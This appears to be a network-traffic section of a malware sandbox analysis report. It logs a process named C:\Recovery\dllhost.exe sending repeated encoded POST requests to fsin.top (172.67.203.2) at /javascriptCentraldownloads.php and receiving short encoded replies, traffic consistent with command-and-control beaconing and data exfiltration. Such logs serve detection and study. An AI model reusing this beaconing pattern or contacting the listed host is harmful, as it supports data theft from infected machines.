                                                  Data Ascii: QSXT_YXS\^ZQTRWTW_^[V[QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X'"5>4X0 )(2>&"%+'?&Y$38-;6($%&G#.X!4
                                                  Aug 1, 2024 07:38:04.213808060 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:04.425467968 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:04 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwl1KzQ4Gdbd9BTzSHF%2B0Ki7gQ4jpi89SgVjNxtriVn5PLY4LVbf1rN6386EFfXnwRVzgDoXkxQ%2BbN1e6uS2HyGH%2FMWtChiLU7DrYPBZNPSHtNekX7CYBPCJ%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ad80cfa42aa-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  53 | 192.168.2.4 | 49789 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:04.559215069 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:04.912102938 CEST1008OUTData Raw: 54 55 58 52 5a 5e 5d 53 5c 5e 5a 51 54 56 57 52 57 51 5e 56 56 5f 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXRZ^]S\^ZQTVWRWQ^VV_Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'T>58Y'#)+==65&(Q%?Y&(S,>Y5+^1&G#.X!
                                                  Aug 1, 2024 07:38:05.024969101 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:05.406028032 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67wGlVUNhp6Nq8wfRIdRr62Y0shyRlVFS4kdN9yMh1rq3Am3Ql2zquH3WsHyAS0ARjRKo9K69fRHoy%2B9DKZ%2Fk8TRPPhvMXV7zykqCy%2B%2BFBM7%2FWqtduIJ8DaZBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37add19df4238-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  54 | 192.168.2.4 | 49791 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:05.539144993 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:05.896466970 CEST1012OUTData Raw: 51 57 5d 50 5a 5e 58 50 5c 5e 5a 51 54 55 57 57 57 55 5e 5d 56 55 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]PZ^XP\^ZQTUWWWU^]VUQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'!-733^)8*>C%&#W&2& 7;/X!;?%%&G#.X!(
                                                  Aug 1, 2024 07:38:06.026078939 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  55 | 192.168.2.4 | 49792 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:06.326293945 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:06.677781105 CEST1284OUTData Raw: 54 53 58 56 5a 55 58 5d 5c 5e 5a 51 54 57 57 55 57 51 5e 5b 56 5d 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TSXVZUX]\^ZQTWWUWQ^[V]QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_%2=5[40?;)C9&&/&34S,/^!%&G#.X!
                                                  Aug 1, 2024 07:38:06.919786930 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:06.986030102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:07.182743073 CEST | 735 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QhIcj%2BivBQQ6qVqBhLTFBAlkYaghkXyaNdj80IHPVuJB0PemzU8FyBQUsXlGQCTwvz3DuzAIIex5Xhz55X5tGpy%2BWc7Gf47G6t%2BjKYa38UmM%2BetRhjdqU4f3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ae80936c477-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 57 27 5e 3d 0e 35 04 3c 55 29 22 2d 56 2b 23 3c 16 2a 39 33 5f 32 2c 39 58 32 28 0e 52 21 2c 0f 5a 26 2c 22 56 26 54 29 06 3d 37 21 51 04 11 26 16 34 23 00 15 2b 2a 30 01 27 38 3b 5e 23 08 28 5d 27 33 29 1d 22 39 37 04 2a 22 3d 5c 3f 1c 27 52 39 3b 23 17 2b 33 01 00 27 26 2a 56 0d 17 22 12 2e 38 12 54 30 0c 23 09 22 2c 27 56 23 2b 3a 01 3d 06 3e 59 3e 0a 3a 5f 2d 33 2b 59 2a 0d 08 52 3f 04 3d 5f 3e 29 2e 08 30 03 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"W'^=5<U)"-V+#<*93_2,9X2(R!,Z&,"V&T)=7!Q&4#+*0'8;^#(]'3)"97*"=\?'R9;#+3'&*V".8T0#",'V#+:=>Y>:_-3+Y*R?=_>).0"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  56 | 192.168.2.4 | 49793 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:06.607726097 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:06.959072113 CEST1012OUTData Raw: 54 51 58 5d 5a 54 58 5d 5c 5e 5a 51 54 51 57 5a 57 56 5e 5b 56 58 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQX]ZTX]\^ZQTQWZWV^[VXQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X0"-X'&3^?86=5:\'(,&,210<V,?_";\'%&G#.X!
                                                  Aug 1, 2024 07:38:07.061430931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:07.260121107 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13DALdIr2zWopgywb%2BuZiO3o%2FqULpG%2F9tnUXoJNjpBvSVN0Y%2FqBZduHWFvWTxjugcamDC4hSaq3vSSUmfUhySmiU3sKurA52cpMPWFCTMDhE9T8dD5%2FU9iBZ6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ae9db108c78-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  57 | 192.168.2.4 | 49794 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:07.386532068 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:07.740205050 CEST1012OUTData Raw: 54 5e 58 50 5a 54 5d 50 5c 5e 5a 51 54 50 57 51 57 57 5e 5f 56 55 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XPZT]P\^ZQTPWQWW^_VUQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$:!> X$?Y(;=%12?_& 7;X3^58^15&G#.X!<
                                                  Aug 1, 2024 07:38:07.858206987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:08.161073923 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4F2AfduEf08%2B6%2B6%2B%2FR%2BVZOz9GQsyJEaNfLd2ND3V5gpLXEfotQQy10JiiQ8dU7%2F7ofVHAmS8bA5zdKa0u7c3Zg3if1PDyLh2dAmJa4Dl2IMdiFgjOJJKGHyVLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aeeda5f7d06-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  58 | 192.168.2.4 | 49795 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:08.291135073 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:08.646518946 CEST1012OUTData Raw: 54 52 58 50 5a 5f 58 57 5c 5e 5a 51 54 51 57 52 57 5e 5e 5c 56 58 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRXPZ_XW\^ZQTQWRW^^\VXQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y'6"[<'5?])(1=%';<&5& ,R/"4%%&G#.X!
                                                  Aug 1, 2024 07:38:08.746083975 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:08.998102903 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0L3Da9Hx2VE2sarIEjVwR6SfMqLaZ2vATZTgMYdE%2FCaz0QL1f4ySDETCtCjXaFuQOfVXPEpNiG4LvdsNyD0FssPPoN6MYBOkRlm%2Br5KbO39Dr1B%2Bn7F5ZezSCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37af45f0d6a55-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  59 | 192.168.2.4 | 49796 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:09.120790958 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:09.474734068 CEST1012OUTData Raw: 51 50 5d 50 5a 5f 58 53 5c 5e 5a 51 54 57 57 52 57 57 5e 59 56 5c 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]PZ_XS\^ZQTWWRWW^YV\QX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'2=".7&&?)85)C)2;82,>^$3#//^6;+^1&G#.X!
                                                  Aug 1, 2024 07:38:09.574575901 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:09.863615990 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ry%2Br9Iylu9Z%2FE2MKIFitoKDAl5ZHfqSQrt01zwla2q6qjvHH%2Bh4gedWTMxZFbnhHYB84DBqhTPRY7RdwawL69nNdBaAMp3iHShigQdK76isiVMF19%2BG3v02llQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37af98bbc80da-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  60 | 192.168.2.4 | 49797 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:10.071691990 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:10.427819967 CEST1012OUTData Raw: 54 55 5d 52 5f 5f 58 54 5c 5e 5a 51 54 54 57 53 57 54 5e 56 56 5e 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]R__XT\^ZQTTWSWT^VV^Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y$-"-&5?"T>C!%(#R1?.$#$--#]"^'X'5&G#.X!,
                                                  Aug 1, 2024 07:38:10.516783953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:10.734086037 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:10.766777992 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uJ5VApZaIA50iJuqUpyIWJa0xP3U7JNnA7e%2BdFMy01TBRZmSPT%2BREj%2FhPJQTsOHd9UvC1uCYszSWEUQdb5DLxkMBnKZMzzw5TOv4G3rFTG%2B%2F2eyf9tkza6QiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aff7ddc3320-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  61 | 192.168.2.4 | 49798 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:10.943170071 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:11.287419081 CEST1008OUTData Raw: 54 50 5d 50 5f 5a 58 51 5c 5e 5a 51 54 56 57 50 57 5e 5e 58 56 58 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]P_ZXQ\^ZQTVWPW^^XVXQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'5Z!(X3%+-=C>2;<'?Y&3#/;X5^;^%%&G#.X!(
                                                  Aug 1, 2024 07:38:11.410342932 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:11.626044989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:11.660567999 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zepattau50hjAe5vjDiznuLSUIeV13lczyRUxCwDWGGrp3yRzP8h%2BEHVJwSirpUtAy6%2B936cMAcvbKFALXHo4n8%2BpNW8IKQtjn%2BggbGiWScjKN0auqVi6I6F5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0508d80ca8-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  62 | 192.168.2.4 | 49799 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:11.809016943 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.162090063 CEST1012OUTData Raw: 54 50 58 57 5a 59 5d 51 5c 5e 5a 51 54 53 57 50 57 5e 5e 56 56 5e 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXWZY]Q\^ZQTSWPW^^VV^Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'165<Y&6#_<1)C!%P2<*1#8$"^+]'%&G#.X!0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  63 | 192.168.2.4 | 49800 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:12.201324940 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.552751064 CEST | 1264 | OUT | Data Raw: 54 52 58 57 5f 5e 58 50 5c 5e 5a 51 54 55 57 51 57 53 5e 5d 56 54 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TRXW_^XP\^ZQTUWQWS^]VTQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$%![7$/]+()?%:\1%,6^2$S8-<58<%&G#.X!(
                                                  Aug 1, 2024 07:38:12.645518064 CEST | 25 | IN | HTTP/1.1 100 Continue
